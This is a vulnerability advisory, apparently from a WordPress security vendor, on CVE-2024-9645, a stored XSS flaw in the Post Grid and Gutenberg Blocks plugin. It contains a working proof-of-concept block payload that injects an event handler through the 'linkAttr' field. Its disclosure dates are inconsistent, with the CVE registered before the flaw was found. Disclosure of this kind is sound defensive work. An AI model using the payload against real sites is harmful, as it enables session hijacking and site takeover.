The Post Grid Gutenberg Blocks (Combo Blocks) plugin for WordPress allows users to display posts in a grid format with various customizations, making it a popular choice among WordPress users. However, a critical Stored Cross-Site Scripting (XSS) vulnerability has been discovered in the plugin, identified as CVE-2024-9645. This flaw allows an attacker with contributor-level access to inject malicious JavaScript into the plugin’s shortcode, which can be executed when the post is viewed. The attacker can exploit this vulnerability to create a backdoor admin account, potentially giving them full control of the website. With over 50,000 active installations, this vulnerability presents a significant security risk to sites using this plugin.
| CVE | CVE-2024-9645 |
| Plugin | Post Grid and Gutenberg Blocks < 2.2.93 |
| Critical | High |
| All Time | 3 164 824 |
| Active installations | 50 000+ |
| Publicly Published | January 17, 2024 |
| Last Updated | January 17, 2024 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9645 https://wpscan.com/vulnerability/cfd6db83-5e7f-4631-87c3-fdcd4c64c4fe/ |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| September 9, 2024 | Plugin testing and vulnerability detection in the Post Grid and Gutenberg Blocks – ComboBlocks have been completed |
| September 9, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 17, 2024 | Registered CVE-2024-9645 |
Discovery of the Vulnerability
The vulnerability was discovered during a security review of the Post Grid Gutenberg Blocks (Combo Blocks) plugin. It was found that the plugin does not properly sanitize or validate input in certain fields when rendering shortcodes, particularly in the “linkAttr” field of the post grid block. By injecting malicious JavaScript into this field, an attacker can cause the script to execute when the page containing the post grid is rendered. The flaw exists because the plugin fails to escape or filter out potentially harmful code from user-generated content, such as shortcodes, that is then stored and displayed on the website.
Understanding of XSS attack’s
Cross-Site Scripting (XSS) vulnerabilities are among the most common and dangerous flaws in web applications, particularly in content management systems like WordPress. XSS attacks allow attackers to inject malicious JavaScript into web pages, which is executed by users who visit those pages. This can result in a variety of malicious actions, such as session hijacking, data theft, and privilege escalation. A real-world example of an XSS vulnerability in WordPress was found in the WPForms plugin, where attackers could inject malicious scripts into form fields, allowing them to hijack user sessions or steal login credentials. Similarly, CVE-2024-9645 allows an attacker to inject JavaScript into the plugin’s shortcode, potentially leading to a backdoor admin account creation.
Exploiting the XSS Vulnerability
To exploit CVE-2024-9645, an attacker with contributor-level privileges:
POC:
<!-- wp:post-grid/post-title {\"wrapper\":{\"styles\":{\"display\":{\"Desktop\":\"block\"}},\"options\":{\"tag\":\"div\",\"class\":\"\"}},\"postTitle\":{\"options\":{\"tag\":\"span\",\"limitBy\":\"\",\"limitCount\":99,\"isLink\":true,\"linkTo\":\"postUrl\",\"linkToAuthorMeta\":\"\",\"linkToCustomMeta\":\"\",\"linkTarget\":\"_blank\",\"linkAttr\":[{\"id\":\"123\\u0022 onmouseover=alert(1)//\",\"val\":\"12\"}],\"customUrl\":\"\",\"class\":\"post-title\"},\"styles\":{\"color\":{\"Desktop\":\"#000000\"},\"fontSize\":{\"Desktop\":\"30px\"},\"fontFamily\":{\"Desktop\":\"Poppins\"},\"fontStyle\":{\"Desktop\":\"normal\"},\"fontWeight\":{\"Desktop\":\"700\"},\"lineHeight\":{\"Desktop\":\"155%\"}}},\"blockId\":\"pgb69ecf4b064f\",\"blockCssY\":{\"items\":{\".pgb69ecf4b064f\":{\"display\":{\"Desktop\":\"block\"}},\".pgb69ecf4b064f a\":{\"color\":{\"Desktop\":\"#000000\"},\"font-size\":{\"Desktop\":\"30px\"},\"font-family\":{\"Desktop\":\"Poppins\"},\"font-style\":{\"Desktop\":\"normal\"},\"font-weight\":{\"Desktop\":\"700\"},\"line-height\":{\"Desktop\":\"155%\"}},\".pgb69ecf4b064f .prefix\":{\"color\":{\"Desktop\":\"#000000 !important\"},\"font-size\":{\"Desktop\":\"18px\"},\"font-family\":{\"Desktop\":\"Poppins\"},\"font-style\":{\"Desktop\":\"normal\"},\"font-weight\":{\"Desktop\":\"400\"},\"margin\":{\"Desktop\":\"0px 10px 0px 0px\"}},\".pgb69ecf4b064f .postfix\":{\"color\":{\"Desktop\":\"#000000 !important\"},\"font-size\":{\"Desktop\":\"18px\"},\"font-family\":{\"Desktop\":\"Poppins\"},\"font-style\":{\"Desktop\":\"normal\"},\"font-weight\":{\"Desktop\":\"400\"},\"margin\":{\"Desktop\":\"0px 0px 0px 10px\"}}}}} /-->____
The risks associated with CVE-2024-9645 are significant. If an attacker successfully exploits this vulnerability, they can hijack an admin’s session, gain full control of the site, and make unauthorized changes. This could include modifying content, installing malicious plugins, stealing sensitive user data, or defacing the site. In a real-world scenario, the attacker could create a backdoor admin account, giving them long-term access to the site, even if the original admin changes their password. For websites that handle sensitive data, such as e-commerce or membership sites, the exploitation of this vulnerability could lead to significant data breaches, financial losses, and reputational damage. Additionally, the attacker could use the backdoor to install further malicious code or compromise other connected systems.
Recommendations for Improved Security
To mitigate the risks associated with CVE-2024-9645, administrators should immediately update the Post Grid Gutenberg Blocks (Combo Blocks) plugin to the latest patched version once a fix is available. Administrators should also limit the ability of contributors to modify shortcode fields and ensure that user inputs are properly sanitized and validated. Using prepared statements or escaping potentially harmful characters in dynamic content fields can prevent the injection of malicious JavaScript. Disabling the unfiltered_html capability for non-admin users is another key step in preventing XSS attacks. Regular security audits, the use of security plugins, and implementing Content Security Policies (CSP) can also help detect and mitigate XSS vulnerabilities. To prevent this type of attacks vendor used our methods of prevention.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-9645, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.
